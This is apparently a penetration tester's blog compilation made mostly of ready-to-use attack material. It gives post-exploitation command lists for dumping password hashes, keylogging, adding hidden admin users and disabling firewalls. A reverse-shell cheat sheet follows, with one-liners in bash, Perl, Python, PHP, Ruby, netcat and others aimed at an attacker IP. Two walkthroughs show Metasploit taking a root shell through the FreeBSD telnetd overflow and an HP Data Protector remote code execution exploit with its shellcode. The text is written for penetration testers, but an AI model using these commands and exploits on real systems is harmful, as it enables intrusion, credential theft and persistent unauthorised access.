Post Exploit Commands

pentest_wallpaper

Credit for most of the below comes from Mubix who has created a few documents (on google docs) that lists what to actually do once shell access has been gained. You can read more about it here and find the links to the docs, I’m simply blogging about it to make a summary of this for myself.

Meterpreter Post Auth

Information Gathering

getuid
getpid
getsprivs
sysinfo
screenshot
run winenum.rb
run scraper.rb
run checkvm
run credscollect
run get_local_subnets

Escalating Privs

ps then migrate
getsystem

Tokens (use incognito)

list_tokens -u
impersonate_token
steal_token [pid]
rev2self

Retrieve Passwords

hashdump
cachedump
post/windows/gather/smart_hashdump
post/windows/gather/credentials/vnc

Session

enumdesktops
getdesktop
setdesktop
uictl disable keyboard

Keylog

keyscan_start
keyscan_dump
keyscan_stop

Nix Post Auth

Disable Firewall

/etc/init.d/iptables save
/etc/init.d/iptables stop
iptables-save > /root/firewall.rules
iptables-restore < /root/firewall.rules

Files to pull

/etc/passwd
/etc/shadow OR /etc/security/shadow (on AIX)
/etc/groups OR /etc/gshadow
/home/*/.ssh/id*
/etc/sudoers

User Information

grep ^ssh /home/*/.*hist*
grep ^telnet `/home/*/.*hist*
grep ^mysql /home/*/.*hist*

Windows Post Auth

Add user

net user pentest password /add
net localgroup administrators pentest /add

Add share

net share nothing$=C:\ /grant:pentest,FULL /unlimited

Disable Firewall

netsh firewall set opmode disable

Auto Start Directories

C:\ProgramData\Microsoft\Windows\Start Menu\Programs\Startup\
C:\Documents And Settings\All Users\Start Menu\Programs\StartUp\
C:\wmiOWS\Start Menu\Programs\StartUp\
C:\WINNT\Profiles\All Users\Start Menu\Programs\StartUp\

Accounts and Policies

net localgroup administrators OR net localgroup administrators /domain
net group “Domain Admins” /domain
net accounts ## or net accounts /domain

Files to pull

%SYSTEMROOT%\repair\SAM
%SYSTEMROOT%\System32\config\RegBack\SAM
%WINDIR%\repair\sam OR system OR software OR security
reg save HKLM\Security security.hive
reg save HKLM\System system.hive
reg save HKLM\SAM sam.hive

Enable Remote Desktop

reg add “HKLM\SYSTEM\CurrentControlSet\Control\Terminal Server” /v fDenyTSConnections /t REG_DWORD /d 0 /f

Should you wish to have all this useful info (as well as an ascii table) then feel free to use the following wallpaper (1920×1200).

Or customize the GIMP XCF file yourself.

Reverse Shell Cheat Sheet

There are many pages on the web documenting quick reverse shell one liners. Pentestmonkey and Bernardo Damele have both created a good few posts between them but I wanted to recapture what they’ve got for my notes purposes. (It’s easier for me to find stuff if it’s in one place). All credit goes to both of those guys where I got all this info from.

Step one – Set up your listener.

nc -l -v attackerip 4444

In all these examples the attacker IP will be 192.168.0.100

Bash

exec 5<>/dev/tcp/192.168.0.100/4444
cat <&5 | while read line; do $line 2>&5 >&5; done
0<&196;exec 196<>/dev/tcp/192.168.0.100/4444; sh <&196 >&196 2>&196
bash -i >& /dev/tcp/192.168.0.100/4444 0>&1

Perl

perl -e ‘use socket;$i="192.168.0.100";$p=4444;socket(S,PF_INET,SOCK_STREAM,getprotobyname("tcp"));if(connect(S,sockaddr_in($p,inet_aton($i)))){open(STDIN,">&S");open(STDOUT,">&S");open(STDERR,">&S");exec("/bin/sh -i");};’
perl -MIO -e ‘$p=fork;exit,if($p);$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

For windows based systems you can use

perl -MIO -e ‘$c=new IO::Socket::INET(PeerAddr,"192.168.0.100:4444");STDIN->fdopen($c,r);$~->fdopen($c,w);system$_ while<>;’

Python

python -c ‘import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("192.168.0.100",4444));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1); os.dup2(s.fileno(),2);p=subprocess.call(["/bin/sh","-i"]);’

PHP

php -r ‘$sock=fsockopen("192.168.0.100",4444);exec("/bin/sh -i <&3 >&3 2>&3");’

Ruby

ruby -rsocket -e‘f=TCPSocket.open("192.168.0.100",4444).to_i;exec sprintf("/bin/sh -i <&%d >&%d 2>&%d",f,f,f)

The following does not need /bin/sh:

ruby -rsocket -e ‘exit if fork;c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end’

The following is for windows based systems:

ruby -rsocket -e ‘c=TCPSocket.new("192.168.0.100","4444");while(cmd=c.gets);IO.popen(cmd,"r"){|io|c.print io.read}end’

NetCat

nc -e /bin/sh 192.168.0.100 4444
nc -c /bin/sh 192.168.0.100 4444
/bin/sh | nc 192.168.0.100 4444

If the -e flag is disabled you can get around it using the following

rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.0.0.1 1234 >/tmp/f
rm -f /tmp/p; mknod /tmp/p p && nc attackerip 4444 0/tmp/p

Java

r = Runtime.getRuntime()
p = r.exec(["/bin/bash","-c","exec 5<>/dev/tcp/192.168.0.100/4444;cat <&5 | while read line; do \$line 2>&5 >&5; done"] as String[])
p.waitFor()

Telnet
If netcat is missing (and in most cases you wont have this), then use telnet:

rm -f /tmp/p; mknod /tmp/p p && telnet 192.168.0.100 4444 0/tmp/p
telnet 192.168.0.100 4444 | /bin/bash | telnet 192.168.0.100 4445
# also listen on your machine also on port 4445/tcp

Xterm
This one is a little more tricky, you need to start a listener on the attacker box to catch the incoming xterm

Xnest :1; xterm -display 127.0.0.1:1

and then inside the spawned xterm session run this:

xhost +victimip

Then on the victim you need to run this

xterm -display 192.168.0.100:1

FreeBSD Derived telnetd service Exploit

Mentioned by hdm here and here but I wanted to make a note of this myself.
First thing to do is setup the scan to look for vulnerable telnetd services:

msf > use auxiliary/scanner/telnet/telnet_encrypt_overflow
msf  auxiliary(telnet_encrypt_overflow) > set RHOSTS 192.168.0.0/24
RHOSTS => 192.168.0.0/24
msf  auxiliary(telnet_encrypt_overflow) > set THREADS 64
THREADS => 64

And now to run the scan

msf  auxiliary(telnet_encrypt_overflow) > run
[*] 192.168.0.1:23 Does not support encryption: Netgear Embedded Telnet Server (c) 2000-2007\x0a\x0aWARNING:  Access allowed by authorized users only.\x0a\x0alogin: \x0aERROR – Your telnet client rejected our request to use char-at-a-time mode!\x0aUnable to operate under this condition.\r\x0a\x0a\x0a\x0aYour telnet session has expired due to inactivity…
[+] 192.168.0.13:23 VULNERABLE: FreeBSD/i386 () (ttyp0)\x0d\x0a\x0d\x0alogin:
[*] Scanned 026 of 256 hosts (010% complete)
[*] Scanned 053 of 256 hosts (020% complete)
[*] Scanned 087 of 256 hosts (033% complete)
[*] Scanned 105 of 256 hosts (041% complete)
[*] Scanned 132 of 256 hosts (051% complete)
[*] Scanned 196 of 256 hosts (076% complete)
[*] Scanned 213 of 256 hosts (083% complete)
[*] Scanned 224 of 256 hosts (087% complete)
[*] Scanned 235 of 256 hosts (091% complete)
[*] Scanned 256 of 256 hosts (100% complete)
[*] Auxiliary module execution completed
msf  auxiliary(telnet_encrypt_overflow) >

Looks like 192.168.0.13 is vulnerable, what a surprise.
The exploit we need to use here is exploit/freebsd/telnet/telnet_encrypt_keyid:

msf  exploit(telnet_encrypt_keyid) > info

       Name: FreeBSD Telnet Service Encryption Key ID Buffer Overflow
     Module: exploit/freebsd/telnet/telnet_encrypt_keyid
    Version: 0
   Platform: BSD
 Privileged: Yes
    License: Metasploit Framework License (BSD)
       Rank: Great

Provided by:
  Jaime Penalba Estebanez <jpenalbae@gmail.com>
  Brandon Perry <bperry.volatile@gmail.com>
  Dan Rosenberg
  hdm <hdm@metasploit.com>

Available targets:
  Id  Name
   —-
  0   Automatic
  1   FreeBSD 8.2
  2   FreeBSD 8.1
  3   FreeBSD 8.0
  4   FreeBSD 7.3/7.4
  5   FreeBSD 7.0/7.1/7.2
  6   FreeBSD 6.3/6.4
  7   FreeBSD 6.0/6.1/6.2
  8   FreeBSD 5.5
  9   FreeBSD 5.3

Basic options:
  Name      Current Setting  Required  Description
  —-      —————  ——–  ———–
  PASSWORD                   no        The password for the specified username
  RHOST                      yes       The target address
  RPORT     23               yes       The target port
  USERNAME                   no        The username to authenticate as

Payload information:
  Space: 128
  Avoid: 1 characters

Description:
  This module exploits a buffer overflow in the encryption option
  handler of the FreeBSD telnet service.

References:
  http://cve.mitre.org/cgi-bin/cvename.cgi?name=2011-4862
  http://www.osvdb.org/78020
  http://www.securityfocus.com/bid/51182
  http://www.exploit-db.com/exploits/18280/

msf  exploit(telnet_encrypt_keyid) >

The payload is limited to 128 characters so we only have a few options, shell is more than enough though!

msf  exploit(telnet_encrypt_keyid) > show payloads

Compatible Payloads
===================

   Name                        Disclosure Date  Rank    Description
   —-                        —————  —-    ———–
   bsd/x86/exec                                 normal  BSD Execute Command
   bsd/x86/metsvc_bind_tcp                      normal  FreeBSD Meterpreter Service, Bind TCP
   bsd/x86/metsvc_reverse_tcp                   normal  FreeBSD Meterpreter Service, Reverse TCP Inline
   bsd/x86/shell/bind_tcp                       normal  BSD Command Shell, Bind TCP Stager
   bsd/x86/shell/reverse_tcp                    normal  BSD Command Shell, Reverse TCP Stager
   bsd/x86/shell_bind_tcp                       normal  BSD Command Shell, Bind TCP Inline
   bsd/x86/shell_reverse_tcp                    normal  BSD Command Shell, Reverse TCP Inline
   generic/custom                               normal  Custom Payload
   generic/debug_trap                           normal  Generic x86 Debug Trap
   generic/shell_bind_tcp                       normal  Generic Command Shell, Bind TCP Inline
   generic/shell_reverse_tcp                    normal  Generic Command Shell, Reverse TCP Inline
   generic/tight_loop                           normal  Generic x86 Tight Loop

We’ll select bsd/x86/shell/bind_tcp to make things quick.

msf  exploit(telnet_encrypt_keyid) > set payload bsd/x86/shell/bind_tcp
payload => bsd/x86/shell/bind_tcp
msf  exploit(telnet_encrypt_keyid) > set rhost 192.168.0.13
rhost => 192.168.0.13

And now to exploit, note that it trys against all versions of FreeBSD from 5.5 to 8.2

msf  exploit(telnet_encrypt_keyid) > exploit -j
[*] Exploit running as background job.

[*] Brute forcing with 9 possible targets
[*] Trying target FreeBSD 8.2…
[*] Started bind handler
msf  exploit(telnet_encrypt_keyid) > [*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 8.1…
[*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 8.0…
[*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 7.3/7.4…
[*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 7.0/7.1/7.2…
[*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 6.3/6.4…
[*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 6.0/6.1/6.2…
[*] Sending first payload
[*] Sending second payload…
[*] Trying target FreeBSD 5.5…
[*] Sending stage (46 bytes) to 192.168.0.13
[*] Sending first payload
[*] Command shell session 1 opened (192.168.0.8:41452 -> 192.168.0.13:4444) at 2012-01-18 11:01:05 -0500
[*] Sending second payload…

Looks like we got shell

msf  exploit(telnet_encrypt_keyid) > sessions -i 1
[*] Starting interaction with 1…

whoami
root

To be more stealthy you could set the exploit code to the specific version of FreeBSD you’re targeting:

Available targets:
  Id  Name
   —-
  0   Automatic
  1   FreeBSD 8.2
  2   FreeBSD 8.1
  3   FreeBSD 8.0
  4   FreeBSD 7.3/7.4
  5   FreeBSD 7.0/7.1/7.2
  6   FreeBSD 6.3/6.4
  7   FreeBSD 6.0/6.1/6.2
  8   FreeBSD 5.5
  9   FreeBSD 5.3
msf  exploit(telnet_encrypt_keyid) > set target 7
target => 7
msf  exploit(telnet_encrypt_keyid) > exploit -j
[*] Exploit running as background job.

[*] Started bind handler
msf  exploit(telnet_encrypt_keyid) > [*] Sending first payload
[*] Sending second payload…
[*] Sending stage (46 bytes) to 192.168.0.13
[*] Command shell session 2 opened (192.168.0.8:48865 -> 192.168.0.13:4444) at 2012-01-18 11:03:55 -0500
sessions -l

Active sessions
===============

  Id  Type       Information  Connection
   —-       ———–  ———-
  2   shell bsd               192.168.0.8:48865 -> 192.168.0.13:4444

HP Data Protector <6.20 vulnerability

Ok so on a job I found a service running on TCP port 5555 on a few servers. A little probing with netcat allowed me to identify the service(all of the output below is from my own testbed, hence the local 192.168.x.x IPs):

root@bt:~# nc 192.168.0.18 5555
break
HP Data Protector A.06.11: INET, internal build 243, built on 25 August 2009, 13:08
root@bt:~#

This version is flagged as vulnerable as per this HP Security Bulletin. A little digging with exploitdb found the following exploits:

root@bt:~# /pentest/exploits/exploitdb/searchsploit protector
 Description                                                                 Path
————————————————————————— ————————-
HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos Exploit             /windows/dos/9006.py
HP Data Protector 4.00-SP1b43064 Remote Memory Leak/Dos (meta)              /windows/dos/9007.rb
HP Data Protector Media Operations 6.11 Multiple Modules NULL Pointer Dereference DoS /windows/dos/14974.txt
HP Data Protector Media Operations NULL Pointer Dereference Remote DoS      /win32/dos/15214.py
HP Data Protector Media Operations 6.11 HTTP Server Remote Integer Overflow DoS /windows/dos/15307.py
HP Data Protector Manager A.06.11 MMD NULL Pointer Dereference Denial of Service /windows/dos/15649.pl
HP Data Protector Manager v6.11 Remote DoS in RDS Service                   /windows/dos/15940.pl
HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055)    /windows/remote/17339.py
HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056)  /windows/remote/17345.py
HP Data Protector 6.20 Multiple Vulnerabilities                             /windows/dos/17458.txt
HP Data Protector 6.20 EXEC_CMD Buffer Overflow Vulnerability               /windows/dos/17461.txt
HP Data Protector 6.11 Remote Buffer Overflow + DEP Bypass                  /windows/remote/17468.py
HP Data Protector Remote Shell for HP-UX                                    /hp-ux/remote/17614.sh
HP Data Protector Remote Root Shell for Linux                               /linux/remote/17648.sh
HP Data Protector Media Operations <= 6.20 Directory Traversal              /windows/webapps/18077.txt
root@bt:~#

Of interest are these 2:

HP Data Protector Client EXEC_CMD Remote Code Execution PoC (ZDI-11-055) /windows/remote/17339.py
HP Data Protector Client EXEC_SETUP Remote Code Execution PoC (ZDI-11-056) /windows/remote/17345.py

As I dont have time to edit the shellcode in the second example we’ll just play with the first for now.
The first just runs a command and replays the output to the terminal, the second attempts to download and run the command.
The exploit is as simple as just pointing it to the target and executing:

root@bt:~# python 17339.py 192.168.0.18 5555
Sending payload
[70:18]
[70:18] Windows IP Configuration
[70:18]
[70:18]
[70:18] Ethernet adapter INTERNAL_LAN:
[70:18]    Connection-specific DNS Suffix  . :
[70:18]    IP Address. . . . . . . . . . . . : 192.168.100.1
[70:18]    Default Gateway . . . . . . . . . : 192.168.100.1
[70:18] Ethernet adapter Bridged:
[70:18]    Connection-specific DNS Suffix  . :
[70:18]    IP Address. . . . . . . . . . . . : 192.168.0.18
[70:18]    Subnet Mask . . . . . . . . . . . : 255.255.255.0
[70:18]    Default Gateway . . . . . . . . . : 192.168.0.1
root@bt:~#

A quick look at the shellcode looks like it attempts to run as SYSTEM:

\x00\x00\x00\xa4\x20\x32\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x30\x00\x20\x53\x59\x53\x54\x45\x4d\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x43\x00\x20\x32\x30\x00\x20\x66\x64\x69\x73\x6b\x79\x6f\x75\x00\x20\x50\x6f\x63\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x4e\x54\x41\x55\x54\x48\x4f\x52\x49\x54\x59\x00\x20\x30\x00\x20\x30\x00\x20\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x2e\x2e\x2f\x5c\x77\x69\x6e\x64\x6f\x77\x73\x5c\x73\x79\x73\x74\x65\x6d\x33\x32\x5c\x69\x70\x63\x6f\x6e\x66\x69\x67\x2e\x65\x78\x65\x00\x00

Translates into:

¤ 2 fdiskyou 0 SYSTEM fdiskyou C 20 fdiskyou Poc NTAUTHORITY NTAUTHORITY NTAUTHORITY 0 0 ../../../../../../../../../../\windows\system32\ipconfig.exe

One thing to note is that this will not work on a Win2K box unless you replace /windows/ with /WINNT/. I quickly edited the shellcode to run the whoami.exe command instead to confirm the useraccount we have exploited:

root@bt:~# python 17339.py 192.168.0.18 5555
Sending payload
[70:18] nt authority\system
root@bt:~#

Sweet so it works.
Afterword, although there is an exploit in metasploit that supposedly works it isnt designed for windows targets and to get it to work you have to bodge it and it still only sends 4 characters, pointless:

msf  exploit(openview_omniback_exec) > info

       Name: HP OpenView OmniBack II Command Execution
     Module: exploit/multi/misc/openview_omniback_exec
SNIP
Description:
  This module uses a vulnerability in the OpenView Omniback II service
  to execute arbitrary commands. This vulnerability was discovered by
  DiGiT and his code was used as the basis for this module. For
  Microsoft Windows targets, due to module limitations, use the
  "unix/cmd/generic" payload and set CMD to your command. You can only
  pass a small amount of characters (4) to the command line on
  Windows.

Connecting to HTTPS services from the terminal

A little brain issue prevented me from remembering how to connect to a HTTPS service on the command line. NetCat doesnt seems to work, it just hangs.
Fortunately after wasting sometime i recalled how to do it in not one but 2 ways:
Option 1 : ncat (part of the nmap tool kit)

root@bt:~# ncat –ssl www.phillips321.co.uk 443
OPTIONS / HTTP/1.1
Host:www.phillips321.co.uk

HTTP/1.1 200 OK
Date: Tue, 17 Jan 2012 15:24:24 GMT
Server: Apache/2.2.21 (Unix) mod_ssl/2.2.21 OpenSSL/1.0.0d PHP/5.3.6
X-Powered-By: PHP/5.3.6
Vary: Accept-Encoding,Cookie
Cache-Control: max-age=3, must-revalidate
WP-Super-Cache: Served supercache file from PHP
Transfer-Encoding: chunked
Content-Type: text/html; charset=UTF-8

Option 2 : openssl (part of the openssl tools)

openssl s_client -connect www.phillips321.co.uk:443

Be warned though, using the openssl was will echo out all the certificate details….